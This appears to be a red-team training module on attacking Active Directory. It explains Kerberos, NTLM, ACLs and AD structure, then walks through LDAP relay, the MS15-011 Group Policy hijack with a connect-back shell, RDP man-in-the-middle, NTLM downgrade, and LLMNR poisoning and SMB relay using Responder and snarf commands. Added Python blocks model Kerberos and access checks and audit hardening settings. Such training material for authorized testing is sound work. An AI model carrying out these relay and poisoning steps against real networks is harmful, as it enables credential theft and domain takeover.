3-Red Teaming Active Directory

The document discusses techniques for compromising an organization's Active Directory environment. It begins with an introduction to Active Directory fundamentals and traditional attacks. It then focuses on red team oriented attacks against Active Directory, including ways to hijack Kerberos tickets and remotely access the internal network. The document explores weaknesses in NTLM and Kerberos authentication and common attacks that target each protocol. It also covers authorization in Active Directory and how access to resources is validated based on a user's security token.


3.1. Introduction

3.2. Active Directory fundamentals

3.3. Traditional AD attacks

3.4. Red team oriented AD attacks

3.5. Kerberos tickets when NTLM is disabled

3.6. Password spraying using Kerberos

3.7. Persisting in Active Directory

PT e treme - Caendra Inc. © 2017


As far as the overall security posture of organizations is
concerned, they have been focusing on the perimeter for years.
Our job has been relatively easy.



This has changed over the last few years, with organizations
integrating and utilizing security enhancements, that not
only harden their internal infrastructure, but also allow for
better infrastructure monitoring and logging.



We have already seen how we can gain an initial foothold in
the targeted network, by means of an advanced social
engineering attack. We have also covered advanced concepts
in Active Directory reconnaissance and enumeration.



In this module we will cover:
• Ways in which we can totally compromise an
organization’s network.



We will focus our attention on Windows environments and
especially Active Directory (AD) since this is the type of
environment most organizations have in place due to its
versatility and management capabilities.



Additionally, AD is constructed and used in such a way that, if it is
compromised, most of the organization’s assets and sensitive
data can be accessed as well.


As mentioned before, our approach will be the one of a red
team member (also known as the low and slow approach),
but for completeness' sake, we will showcase key concepts of
the traditional approach as well. This will help us understand
the benefits of the red team approach.



When delivering an advanced penetration test or red team
exercise, we want our activities to look like normal actions.
Not only will we be stealthy this way, but we will also minimize
the possibility of disrupting normal operations.


Before covering red team oriented attacks, let’s first get
familiar with the Active Directory environment and then, we
will cover some key concepts of the traditional network
penetration testing approach.



Active Directory, or AD, is a Windows-based directory
service. It allows for centralized management of
authentication and authorization.



Active Directory enables administrators to deploy role-based
access control and least privilege efficiently.



Active Directory grants access based on Kerberos tickets.

Non-Windows devices, such as firewalls, can also authenticate
against AD using LDAP or RADIUS.


Many companies use Active Directory for Single Sign-On or
SSO, which allows internal sites, email access, FTP and other
server programs to authenticate users based on their AD
credentials.



A word of caution with SSO: the credentials are only as
strong as the weakest link.

For example, if there is a weak internal site that authenticates
a user using his AD credentials, an attacker could potentially
compromise that site and retrieve AD credentials.


Whenever a connection, a query or modification must occur
on a directory service, LDAP (Lightweight Directory Access
Protocol) comes into play.

Following this slide, there is a brief overview of LDAP.



Lightweight Directory Access Protocol (LDAP)
• X.500 Standard
• Based on TCP/IP
• A method for accessing, searching, and modifying a
directory service
• A client-server model



As far as authentication on Active Directory is concerned, the
most common way for users to authenticate is by providing a
username and password.

However, some computer systems also support authentication
based on smart cards, one-time passwords, or biometric
information.


Authentication in Active Directory

Common logon scenarios:
➢ Interactive logon: grants access to the local computer
➢ Network authentication: grants access to network resources


Common authentication Security Support Providers on
Windows Systems:
➢ NTLM
➢ Kerberos



Kerberos Authentication Steps
1. User authenticates to KDC. The initial request encrypts the current UTC timestamp with a long-term key.
2. If KDC can decrypt the timestamp with the user’s key that is stored on AD and the time is within the accepted skew, authentication succeeds. KDC then creates a TGT, encrypted with the ‘krbtgt’ account’s long-term key. The TGT is really just a special service ticket. Like all service tickets, it includes user identity information in a Privilege Attribute Certificate (PAC).
3. User requests a service ticket from the KDC. The request includes the user’s TGT (from step 2), encrypted with the ‘krbtgt’ account’s long-term key.
4. KDC decrypts the TGT and creates a service ticket. The user’s PAC information is copied from the TGT to the new ticket. KDC then sends the service ticket to the user, who will pass it on to the target service. The ticket is encrypted with the target service account’s long-term key.
5. User sends the service ticket and the service decrypts the ticket with its long-term key. The user’s PAC information is included in the encrypted ticket, allowing the service to determine the user’s authorization level for the service.
6. Service requests KDC to verify the ‘krbtgt’ signature for the PAC data.
7. Service sends encrypted timestamp for user validation (provides mutual authentication).

Source: ADSecurity.org
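The seven steps above as an added toy model, not part of the original slides or of any real KDC implementation: encryption under a long-term key is simulated with a keyed HMAC, and the user, service and key names are constructed. It exercises the clock-skew check of step 2 and shows what the PAC validation of step 6 catches, which is the check the Weaknesses table later calls "TGS PAC validation is usually skipped".

```python
import hashlib
import hmac
import json

CLOCK_SKEW = 300           # seconds; Kerberos tolerates 5 minutes of skew by default
NOW = 1_700_000_000.0      # constructed "current time" so the demo is deterministic


def _mac(key, data):
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def _canon(obj):
    return json.dumps(obj, sort_keys=True).encode()


def seal(key, payload):
    """Stand-in for 'encrypt with a long-term key': only a holder of `key`
    can produce a ticket whose MAC verifies (real Kerberos uses AES or RC4)."""
    body = _canon(payload)
    return {"body": body.decode(), "mac": _mac(key, body)}


def unseal(key, sealed):
    """Returns the payload, or None if it was not sealed under `key`."""
    body = sealed["body"].encode()
    if not hmac.compare_digest(_mac(key, body), sealed["mac"]):
        return None
    return json.loads(body)


class KDC:
    def __init__(self, user_keys, service_keys, krbtgt_key, groups):
        self.user_keys = user_keys        # per-user long-term keys (steps 1-2)
        self.service_keys = service_keys  # per-service long-term keys (step 4)
        self.krbtgt_key = krbtgt_key      # the key the TGT is sealed with (steps 2-3)
        self.groups = groups              # group membership that goes into the PAC

    def sign_pac(self, pac):
        # The KDC's signature over the PAC; step 6 asks the KDC to re-check it.
        return _mac(self.krbtgt_key, _canon(pac))

    def as_exchange(self, user, sealed_timestamp, now):
        """Steps 1-2: verify the pre-authentication timestamp, issue a TGT."""
        pre = unseal(self.user_keys[user], sealed_timestamp)
        if pre is None or abs(now - pre["ts"]) > CLOCK_SKEW:
            return None  # wrong key, or timestamp outside the accepted skew
        pac = {"user": user, "groups": self.groups[user]}
        return seal(self.krbtgt_key, {"pac": pac, "pac_sig": self.sign_pac(pac)})

    def tgs_exchange(self, tgt, service):
        """Steps 3-4: decrypt the TGT and copy its PAC into a service ticket."""
        inner = unseal(self.krbtgt_key, tgt)
        if inner is None:
            return None
        return seal(self.service_keys[service],
                    {"svc": service, "pac": inner["pac"], "pac_sig": inner["pac_sig"]})

    def verify_pac(self, pac, pac_sig):
        """Step 6: the service asks the KDC to validate the krbtgt signature."""
        return hmac.compare_digest(self.sign_pac(pac), pac_sig)


def service_accepts(kdc, service, service_key, ticket, validate_pac):
    """Step 5, plus step 6 when validate_pac is True. Returns the PAC the
    service will authorize against, or None if the ticket is rejected."""
    inner = unseal(service_key, ticket)
    if inner is None or inner["svc"] != service:
        return None
    if validate_pac and not kdc.verify_pac(inner["pac"], inner["pac_sig"]):
        return None
    return inner["pac"]


# Constructed lab realm: one user, one service and the krbtgt key.
USER_KEY, SVC_KEY, KRBTGT_KEY = b"alice-key", b"fs01-key", b"krbtgt-key"


def make_kdc():
    return KDC({"alice": USER_KEY}, {"cifs/fs01": SVC_KEY}, KRBTGT_KEY,
               {"alice": ["Domain Users"]})


def full_exchange(stale_by=0, validate_pac=True):
    """Runs steps 1-6 for alice against cifs/fs01. `stale_by` ages the
    pre-authentication timestamp to exercise the skew check of step 2."""
    kdc = make_kdc()
    tgt = kdc.as_exchange("alice", seal(USER_KEY, {"ts": NOW - stale_by}), NOW)
    if tgt is None:
        return None
    ticket = kdc.tgs_exchange(tgt, "cifs/fs01")
    return service_accepts(kdc, "cifs/fs01", SVC_KEY, ticket, validate_pac)


def altered_pac_rejected(validate_pac):
    """A service ticket whose PAC was changed and re-sealed under the service
    key is only caught when step 6 runs: the service key cannot produce a
    valid krbtgt signature, so the copied signature no longer matches."""
    kdc = make_kdc()
    tgt = kdc.as_exchange("alice", seal(USER_KEY, {"ts": NOW}), NOW)
    inner = unseal(SVC_KEY, kdc.tgs_exchange(tgt, "cifs/fs01"))
    inner["pac"] = {"user": "alice", "groups": ["Domain Admins"]}
    altered = seal(SVC_KEY, inner)
    return service_accepts(kdc, "cifs/fs01", SVC_KEY, altered, validate_pac) is None
```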
Hijacking Kerberos Tickets to Remotely Access the Intranet


Weaknesses

NTLM:
• The encryption employed can be cracked
• No mutual authentication
• The user’s hash is the basis of all communications
• Credential reuse is possible
• Credentials can be leaked from a user’s browser

Kerberos:
• When RC4 encryption is employed, what we have is actually the NTLM hash
• Compromise of the long-term key equals compromise of Kerberos
• Credential reuse is possible
• TGS PAC validation is usually skipped


For your reference, the next two slides contain the attacks
that target NTLM and Kerberos authentication. Do not worry
if you are unfamiliar with some of them. We will cover the
most important ones, as the module progresses.



NTLM Attacks
✓ SMB Relay
✓ Intranet HTTP NTLM authentication - Relay to attacker
✓ NBNS/LLMNR Poisoning (including WPAD attacks)
✓ HTTP -> SMB NTLM Relay
✓ ZackAttack - SOCKS proxy, SMB/HTTP, LDAP etc.
✓ Pass-the-hash



Kerberos Attacks
✓ Replay Attacks
✓ Pass-the-Ticket
✓ Over-pass-the-Hash (aka pass the key)
✓ Offline (User) Password Cracking (Kerberoast)
✓ Forged Tickets – Golden/Silver
✓ Diamond PAC
✓ MS14-068
✓ Skeleton Key
Let’s now see how authorization works on Active Directory.

When a user logs on to a system, he submits his credentials in
order to interact with resources.


Active Directory validates access to a resource based on the
user’s security token. The check, in essence, is the procedure
of determining whether the user (as represented by the security
token) is included in the Access Control List (ACL) for the
requested object/resource.


Some of the types of attributes that might be contained in
the security token are:
• user group
• ownership
• admin privileges



The primary means by which a security principal is identified
when trying to access network resources is an identifier
called security identifier (SID). The SID attribute is unique for
each user or security group.



An access control list (ACL) is a list of access control entries
(ACE). Each ACE in an ACL identifies a security principal and
the access rights allowed, denied or audited for that
principal.

The security descriptor for a securable object can contain two
types of ACLs: a DACL and a SACL.


A discretionary access control list (DACL) identifies the
security principals that are allowed or denied access to an
object.

When a person or process tries to access an object, the system
checks the ACEs in the object's DACL to determine whether to
grant access to it.


A system access control list (SACL) enables administrators to
log attempts to access a secured object.

Each ACE specifies the types of access attempts by a specified
principal that cause the system to generate a record in the
security event log.

An ACE in a SACL can generate audit records when an access
attempt fails, when it succeeds, or both.
Authorization overview in Active Directory
• Security principals are issued security identifiers (SIDs) when the account is created.
• User accounts are issued security tokens during authentication that include the user’s SID and all related group SIDs.
• Shared resources on a network include access control lists (ACL) that define who can access the resource.
• The security token is compared against the Discretionary Access Control List (DACL) on the resource and access is granted or denied.

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
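The token-versus-DACL comparison and the SACL auditing described above, as an added model that is not from the original slides: a token (user SID plus group SIDs) is evaluated against a constructed security descriptor. SIDs, rights and the deny-before-allow ordering are simplified relative to the real Windows access check (no inheritance, generic rights or owner-implied rights).

```python
from dataclasses import dataclass, field

# Access rights as a bit mask, in the style of a Windows access mask.
READ, WRITE, EXECUTE, DELETE = 0x1, 0x2, 0x4, 0x8
EVERYONE = "S-1-1-0"  # well-known SID, implicitly part of every token


@dataclass
class ACE:
    sid: str                  # the security principal this entry is about
    mask: int                 # rights it allows, denies or audits
    kind: str                 # "allow" or "deny" (DACL), "audit" (SACL)
    on_success: bool = False  # SACL: record successful access attempts
    on_failure: bool = False  # SACL: record failed access attempts


@dataclass
class Token:
    user_sid: str
    group_sids: list

    def sids(self):
        return {self.user_sid, EVERYONE, *self.group_sids}


@dataclass
class SecurityDescriptor:
    owner_sid: str
    dacl: list = None                         # None: no DACL, everyone gets all access
    sacl: list = field(default_factory=list)  # empty: nothing is audited


def dacl_grants(dacl, sids, requested):
    """Walks the DACL in order. A deny ACE for one of the token's SIDs that
    covers any requested right stops the check; allow ACEs accumulate until
    every requested right is covered. An empty DACL grants nothing."""
    if dacl is None:
        return True
    remaining = requested
    for ace in dacl:
        if ace.sid not in sids or not (ace.mask & requested):
            continue
        if ace.kind == "deny":
            return False
        remaining &= ~ace.mask
        if remaining == 0:
            return True
    return False


def access_check(sd, token, requested):
    """Returns (granted, audit_records): the DACL decision plus the records
    the SACL would send to the security event log for this attempt."""
    sids = token.sids()
    granted = dacl_grants(sd.dacl, sids, requested)
    records = []
    for ace in sd.sacl:
        if ace.kind != "audit" or ace.sid not in sids or not (ace.mask & requested):
            continue
        if (granted and ace.on_success) or (not granted and ace.on_failure):
            records.append({"user": token.user_sid, "requested": requested,
                            "outcome": "success" if granted else "failure"})
    return granted, records


# Constructed sample domain: RID 512/513 are the real well-known RIDs for
# Domain Admins / Domain Users; the domain part and user RIDs are made up.
DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
DOMAIN_ADMINS, DOMAIN_USERS = f"{DOMAIN}-512", f"{DOMAIN}-513"
ALICE, BOB, CAROL = f"{DOMAIN}-1104", f"{DOMAIN}-1105", f"{DOMAIN}-1106"

SHARE = SecurityDescriptor(
    owner_sid=DOMAIN_ADMINS,
    dacl=[  # canonical order: explicit deny entries before explicit allow entries
        ACE(BOB, WRITE | DELETE, "deny"),
        ACE(DOMAIN_USERS, READ | EXECUTE, "allow"),
        ACE(DOMAIN_ADMINS, READ | WRITE | EXECUTE | DELETE, "allow"),
    ],
    sacl=[ACE(EVERYONE, WRITE | DELETE, "audit", on_success=True, on_failure=True)],
)

ALICE_TOKEN = Token(ALICE, [DOMAIN_USERS])                 # ordinary user
BOB_TOKEN = Token(BOB, [DOMAIN_USERS, DOMAIN_ADMINS])      # admin with an explicit deny
CAROL_TOKEN = Token(CAROL, [DOMAIN_USERS, DOMAIN_ADMINS])  # admin without one
```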
Active Directory Domain Services require a DNS
infrastructure to operate. Active Directory supports AD
integrated DNS. In the case of AD integrated DNS, DNS
information is stored in Active Directory and replicated
through it.

Following this slide, there is a brief overview of the AD and
DNS relations.


Active Directory & DNS
• AD DS requires a DNS infrastructure
• AD DS domain names must be DNS domain names
• AD DS domain controller records must be registered in DNS to enable other domain controllers and client computers to locate the domain controllers
• DNS zones can be stored in AD DS as Active Directory integrated zones

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Active Directory Domain Services consist of various physical
and logical components.



AD DS is composed of both physical and logical components.

Physical components:
• Data store: stores the AD DS information. This is a file on each domain controller.
• Domain controllers: contain a copy of the AD DS database.
• Global catalog server: hosts the global catalog, which is a partial, read-only copy of all the domain naming contexts in the forest. A global catalog speeds up searches for objects that might be attached to other domain controllers in the forest.
• Read-Only Domain Controller (RODC)

Logical components:
• Partitions: various partitions exist in AD DS: domain directory, configuration directory, schema directory, application directory etc.
• Schema: defines the list of attributes all objects in the AD DS can have.
• Domains: logical, administrative boundary for users and computers.
• Domain trees: collection of domain controllers that share a common root domain.
• Forests: collections of domains sharing a common AD DS.
• Sites: collections of users, groups, computers as defined by their physical locations. Useful during replication tasks.
• Organizational units (OUs): organize the elements found at a given site or domain for the purposes of securing them more selectively.

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
First, let’s go through the AD DS physical components:
• Domain Controllers
• Global Catalog Servers
• Data Store
• Replication
• Sites



Domain Controllers
A domain controller is a server with the AD DS server role installed that has
specifically been promoted to a domain controller

Domain controllers:
• Host a copy of the AD DS directory store

• Provide authentication and authorization services

• Replicate updates to other domain controllers in the domain and forest

• Allow administrative access to manage user accounts and network resources

Windows Server 2008 and later support RODCs

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Things to note regarding Domain Controllers:
• Each domain controller holds a copy of the directory store and updates
can be made to the AD DS data on all domain controllers except for
RODCs.

• You can find multiple domain controllers in a domain.

• All domain controllers engage in authentication and authorization.



Things to note regarding RODCs:
• A read-only DC is actually read-only DC services, read-only DNS, read-only
SYSVOL etc.

• A read-only DC has its own KRBTGT account, which means that Kerberos
is cryptographically isolated from the rest of the domain. RODCs do not
have any domain related passwords on them, by default.



Global Catalog Servers
Global catalog servers are domain controllers that also store a copy of the global
catalog

The global catalog:
• Contains a copy of all AD DS objects in a forest that includes only some of
the attributes for each object in the forest

• Improves efficiency of object searches by avoiding unnecessary referrals to
domain controllers

• Required for users to log on to a domain

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Things to note regarding Global Catalog Servers:
• Administrators cannot enter information directly into this partition. The
global catalog builds and updates its content based on values of a schema
attribute (isMemberOfPartialAttributeSet), thus deciding when to
replicate that attribute of an AD DS object in the global catalog.



What is the AD DS Data Store?
The AD DS data store contains the database files and processes that store and
manage directory information for users, services, and applications

The AD DS data store:
• Consists of the Ntds.dit file

• Is stored by default in the %SystemRoot%\NTDS folder on all domain
controllers

• Is accessible only through the domain controller processes and protocols

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Things to note regarding the AD DS Data Store:
• The NTDS.DIT file is a database mainly used to:
1. Store the objects accessible in Active Directory
2. Provide references to objects
3. Store the security descriptors

• The AD DS database is managed by the DC only.



What is AD DS Replication?
AD DS replication copies all updates of the AD DS database to all other domain
controllers in a domain or forest

AD DS replication:
• Ensures that all domain controllers have the same information

• Uses a multimaster replication model

• Can be managed by creating AD DS sites

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Things to note regarding AD DS Replication:
• Domain controllers in the same site replicate their data, typically within
15 seconds after a change, completing replication with all members in a
properly configured tree in about 45 seconds.



Domains
Domains are used to group and manage objects in an
organization (diagram: Contoso.com)

Domains:
• An administrative boundary for applying policies to groups of objects

• A replication boundary for replicating data between domain controllers

• An authentication and authorization boundary that provides a way to limit
the scope of access to resources

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
All of the domain controllers in a particular domain can
receive changes and replicate those changes to all other
domain controllers in the domain.

Each domain in Active Directory is identified by a Domain
Name System (DNS) domain name and requires one or more
domain controllers.


Trees
A domain tree is a hierarchy of domains in AD DS (diagram: contoso.com
with child domains emea.contoso.com and na.contoso.com)

All domains in the tree:
• Share a contiguous namespace with the parent domain

• Can have additional child domains

• By default create a two-way transitive trust with other domains

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Forests
A forest is a collection of
one or more domain trees

Forests:
• Share a common schema

• Share a common configuration partition

• Share a common global catalog to enable searching

• Enable trusts between all domains in the forest

• Share the Enterprise Admins and Schema Admins groups

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Organizational Units
OUs are Active Directory containers that can contain users, groups, computers, and
other OUs

OUs are used to:
• Represent your organization hierarchically and logically

• Manage a collection of objects in a consistent way

• Delegate permissions to administer groups of objects

• Apply policies

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Trusts
Trusts provide a mechanism for users to gain access to resources in another domain

Types of trusts:
• Directional: the trust direction flows from the trusting domain to the trusted
domain

• Transitive: the trust relationship is extended beyond a two-domain trust to
include other trusted domains

• All domains in a forest trust all other domains in the forest

• Trusts can extend outside the forest

https://mva.microsoft.com/en-us/training-courses/understanding-active-directory-8233
Things to note regarding AD Trusts:
• Domains can allow access to shared resources outside of their
boundaries by using a trust. Forest trusts allow users to access resources
in any domain in the other forest, as well as logon to any domain in the
forest.



For a complete picture of the Active Directory structure and
internals please refer to the following links.

✓ https://msdn.microsoft.com/en-us/library/bb727030.aspx

✓ https://www.microsoftpressstore.com/articles/article.aspx?p=2217264
In this module, we are going to cover:
• The network manipulation/exploitation techniques that have
proven most effective over the years.


LDAP Relay
We assume familiarity with SMB relay.

In the case of classic SMB relay, the Domain Controller is
immune and can’t be used as a target due to the “SMB
Signing” option being enabled by default, which is why we
want to remind you of a technique called LDAP Relay.


LDAP Relay can be seen as the good old NTLM Relay with a
twist. The third party host to which we will relay credentials
will be the Domain Controller. LDAP Relay leverages the fact
that signed Lightweight Directory Access Protocol (LDAP)
binds are not required, by default. Consequently, replay
attacks are feasible.


Let’s see how we can perform LDAP relaying using
intercepter-ng.


The attack’s lifecycle is the following:

1. Identify a Domain Administrator’s workstation

2. Become a man in the middle between his workstation and the gateway

3. Inject a hidden link in the web traffic pointing to an HTTP listener that
requests NTLM authentication

4. Redirect the captured credentials to the DC


The environment is the following:

• 192.16.1.100 DC (Windows Server 2008*)
• 192.16.1.13 Domain Administrator’s workstation (Windows 8 machine)
• Signed LDAP binds are not required (this is by default)

*The attack was feasible against an insufficiently secured
Windows Server 2012 R2 DC as well
Walkthrough:
1. 192.16.1.13 is identified as a Domain Administrator’s workstation. We add it
as the target. We also add 192.16.1.1 as the gateway.
2. Inside the sniffer configuration we click on the “Expert Mode” and enable the
LDAP relaying functionality.
3. We also enable “LDAP Relay” on the MiTM options.
4. We submit the DC’s IP address and start ARP poisoning.
5. Once our link is injected the “credentials” are relayed to the Domain
Controller and intercepter-ng adds a new user with administrative privileges
called “cepter”.


Exploiting Group Policies
Group Policy is an infrastructure that allows administrators to
implement specific configurations for users and computers.

Group Policy settings are contained in Group Policy objects
(GPOs), which are linked to the following Active Directory service
containers:
• Sites,
• Domains, or
• organizational units (OUs).
The settings within GPOs are then evaluated by the affected
targets, using the hierarchical nature of Active Directory.

Any computer that boots identifies what OU it is in and what
Group Policies are applied.

There’s a link in the Group Policy object to SYSVOL containing
where these Group Policy files and settings that need to be
applied are, so that those files are copied down and then
applied.


The interesting thing is, that if we become a man in the
middle between a domain controller SYSVOL share and a
client, we can have that client run our version of that Group
Policy.

The feasibility of such an attack was demonstrated during
MS15-011 disclosure.

This vulnerability allows an attacker to perform a MiTM
attack and send custom GPOs back to a Windows system.

You may be wondering why we should remember an old
patch and technique.

The reason why you should remember this vulnerability is
that it is still relevant.


MS15-011 is one of the few cases where the patch alone isn’t
enough. Additional configuration should occur in order to
secure the affected systems.

For more information please refer to the following link:
https://blog.rapid7.com/2015/03/12/are-you-really-protected-against-group-policy-bypass-and-remote-code-execution/

The only publicly available exploit for MS15-011 lives inside
the intercepter-ng tool.

Let’s see how we could exploit an affected AD environment
and hijack a group policy.


The environment is the following:

• 10.10.10.101 DC (Windows Server 2008*)
• 10.10.10.9 Target (Windows 7 machine)
• SMB Signing not enforced
• Our Windows attacking machine should:
✓ NOT be domain-joined
✓ Have “Network access: Let Everyone permissions apply to anonymous users” enabled
✓ Have the appropriate “Advanced sharing options” configured so that it is accessible by
the targeted machine

*The attack was feasible against an insufficiently secured
Windows Server 2012 R2 DC as well

Walkthrough:
1. First we scan the targeted network. Then, we add 10.10.10.9 as a target and
10.10.10.101 as a gateway.
2. Inside the MiTM Options we tick “GP Hijack”. Then, we start sniffing and ARP
poisoning.
3. Once the target searches for an available update for the Group Policy, the
payload (intercepter’s custom connect back shell) is executed.


Additionally, during the post-exploitation phase, we can
tamper with Group Policy objects in AD or with those
settings files in SYSVOL, and have computers apply our
version of the policy settings.

Group Policies have a lot of capabilities, such as adding local
administrators, adding or updating services, etc.

This is an easy (although detectable) way of spreading the
compromise in an AD environment.


RDP MiTM
RDP is widely used in Windows environments mainly for
remote administrative tasks.

Often, RDP is vulnerable to MiTM attacks.

A successful MiTM attack against RDP can result in a
decrypted RDP session containing keystrokes and
subsequently (privileged) credentials.

The all-time classic tool for RDP MiTM attacks is Cain.

For the specifics of this attack please refer to the following
link: http://www.oxid.it/ca_um/topics/apr-rdp.htm


It should be noted that RDP enhanced with TLS encryption
can also be MiTMed.

A great tool for executing such an attack is Seth. Seth can
also attack RDP configurations enhanced with CredSSP.

It should be noted that Network Level Authentication (NLA)
may prevent this attack from being successful and that ARP
poisoning attacks can be easily detected by modern
defenses.

It is not uncommon to come across environments that are
not properly enforcing NLA on their RDP connections or not
using certificates from a trusted authority to protect them.

If we also take into consideration that users having the
privilege to establish RDP connections are privileged ones,
we can understand how devastating an RDP MiTM attack can
be.

Also be aware of the fact that you can perform passwordless
RDP session hijacking in Windows versions if you have
SYSTEM level access on a box.

This is a very stealthy way of gaining access to sensitive
machines. Actually, this is not an attack; it is a Windows
feature!


Sniffing Authentication Traffic
Via ARP cache poisoning we can perform MiTM attacks and
put ourselves in a privileged network position, where we can
intercept authentication traffic.

All native network authentication protocols are susceptible
to disclosure attacks through sniffing.

We can identify usernames and domains easily since they are
flowing in clear text form.

What is more interesting is the possibility of intercepting
password hashes, which as we already know can enable a
variety of attacks. The go-to tools for this are Cain,
intercepter-ng, and PCredz.


Downgrading NTLM
Even on highly secured environments, it is not uncommon to
come across a LAN Manager authentication level other than
“Send NTLMv2 response only\refuse LM & NTLM”.

In that case, we will be able to perform an NTLM downgrade
attack against the targeted network.

Even if a client requests a stronger authentication level, we
can utilize Cain’s functionality to perform a MiTM attack and
downgrade the authentication level.

This way we will gather weaker/crackable hashes. Once
again, it should be noted that ARP cache poisoning attacks
can be easily detected by modern defenses.


Non-Microsoft systems leaking credentials
There is a variety of non-Microsoft systems that utilize
Windows authentication. Those systems can leak Windows
credentials.

We should focus our attention on web proxies, internal
applications, virtualization consoles and database servers
which utilize Windows authentication and oftentimes send
credentials in clear text form, using Basic Authentication or
LM network authentication protocols.

Even in the case that they leverage HTTPS we may be able to
extract (privileged) credentials through sniffing traffic.


LLMNR and NBT-NS poisoning
LLMNR and NBT-NS are both methods of resolving
hostnames to IP addresses.

On a network, if we try to contact a system by name, the first
system that will be reached is DNS.

If that fails, LLMNR will be reached followed by NetBIOS.

LLMNR is the successor to NetBIOS. In case a user tries to
access a system, and it cannot be resolved, then an
LLMNR/NetBIOS request will be sent over multicast or
broadcast respectively.

The interesting thing is that through poisoning attacks on this
kind of legacy Microsoft broadcast traffic an attacker can
respond to these requests, cause the victim to connect to his
machine, and subsequently intercept hashes.

The go-to tool for this kind of attack is Responder.
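The defensive counterpart of the attacks in this section (LDAP relay, SMB relay, the MS15-011 Group Policy hijack, RDP MiTM, NTLM downgrade and LLMNR poisoning), as an added example that is not part of the original slides: the function compares collected registry values with the settings that close each path. The registry paths and expected values are Microsoft's documented ones; SAMPLE_HOST is a constructed set of observations, and collecting the real values (for instance from reg query output) is left to the caller.

```python
# Registry-backed hardening settings that close the attack paths in this
# section. Each entry: (key under HKLM, value name, expected data, note).
BASELINE = [
    (r"SYSTEM\CurrentControlSet\Services\NTDS\Parameters", "LDAPServerIntegrity", 2,
     "LDAP relay: 1 (the default) only negotiates signing, 2 requires it"),
    (r"SYSTEM\CurrentControlSet\Services\LanManServer\Parameters",
     "RequireSecuritySignature", 1,
     "SMB relay to this host: 0 accepts unsigned SMB sessions"),
    (r"SYSTEM\CurrentControlSet\Control\Lsa", "LmCompatibilityLevel", 5,
     "NTLM downgrade: only 5 refuses LM and NTLMv1 responses"),
    (r"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp",
     "UserAuthentication", 1,
     "RDP MiTM: 0 starts sessions without Network Level Authentication"),
    (r"SOFTWARE\Policies\Microsoft\Windows NT\DNSClient", "EnableMulticast", 0,
     "LLMNR poisoning: 1 or absent means the host sends multicast name queries"),
    (r"SOFTWARE\Policies\Microsoft\Windows\NetworkProvider\HardenedPaths", r"\\*\SYSVOL",
     "RequireMutualAuthentication=1, RequireIntegrity=1",
     "MS15-011 GP hijack: the patch alone does not turn UNC hardening on"),
    (r"SOFTWARE\Policies\Microsoft\Windows\NetworkProvider\HardenedPaths", r"\\*\NETLOGON",
     "RequireMutualAuthentication=1, RequireIntegrity=1",
     "MS15-011 GP hijack: the patch alone does not turn UNC hardening on"),
]


def _normalize(value):
    # Tolerate spacing and case differences in REG_SZ data such as "a=1, b=1".
    return "".join(value.split()).lower() if isinstance(value, str) else value


def audit(settings):
    """`settings` maps (key, value name) -> observed data. Absent values are
    reported as 'missing' rather than passed: for these settings the absent
    value either leaves the weaker OS default in place or leaves the
    mitigation switched off, so each one needs a reviewer's eye."""
    findings = []
    for key, name, expected, note in BASELINE:
        observed = settings.get((key, name))
        if observed is None:
            status = "missing"
        elif _normalize(observed) == _normalize(expected):
            status = "ok"
        else:
            status = "weak"
        findings.append({"key": key, "name": name, "observed": observed,
                         "expected": expected, "status": status, "note": note})
    return findings


def gaps(settings):
    """Only the items somebody has to act on."""
    return [f for f in audit(settings) if f["status"] != "ok"]


def report(settings):
    lines = []
    for f in audit(settings):
        lines.append(f"[{f['status']:7}] {f['key']}\\{f['name']} = {f['observed']!r}"
                     f" (expected {f['expected']!r}); {f['note']}")
    return "\n".join(lines)


# Constructed sample: a domain controller that has the MS15-011 patch and the
# SYSVOL hardened path, but not the NETLOGON one, and still permits NTLMv1.
SAMPLE_HOST = {
    (r"SYSTEM\CurrentControlSet\Services\NTDS\Parameters", "LDAPServerIntegrity"): 1,
    (r"SYSTEM\CurrentControlSet\Services\LanManServer\Parameters",
     "RequireSecuritySignature"): 1,
    (r"SYSTEM\CurrentControlSet\Control\Lsa", "LmCompatibilityLevel"): 3,
    (r"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp",
     "UserAuthentication"): 1,
    (r"SOFTWARE\Policies\Microsoft\Windows NT\DNSClient", "EnableMulticast"): 0,
    (r"SOFTWARE\Policies\Microsoft\Windows\NetworkProvider\HardenedPaths", r"\\*\SYSVOL"):
        "RequireMutualAuthentication=1,RequireIntegrity=1",
}

if __name__ == "__main__":
    print(report(SAMPLE_HOST))
```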


Enhancing Responder for a stealthier approach

Responder is usually used in conjunction with an SMB relaying
tool to gain an initial foothold into a network.

The majority of SMB relaying tools will usually touch disk and
create a new service to provide us with a shell. This is quite
noisy.


LLMNR and NBT-NS poisoning

Let’s follow a stealthier approach using snarf.

Of course, for SMB relaying we will need privileged


credentials to relay and a target that does not enforce SMB
signing.

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

Let’s start supposing that we identified a local


administrator’s workstation (10.10.10.103).

Our attacking machine is 10.10.10.102.

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

To identify machines that do not enforce SMB signing on the


network, we can use RunFinger.py (part of Responder).
>> python RunFinger.py –i IP

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

Before we add 10.10.10.107 as a target, we should


remember that Responder loads several rogue
authentication servers, including a SMB one.

We will use snarf as our SMB server so, we should go to


Responder.conf and set “SMB = Off.”

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

To add 10.10.10.107 as a target on snarf, we fire up snarf, go


to the “Control” tab and specify the target’s IP, as follows:
>> node snarf.js attacking_machine’s_IP

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

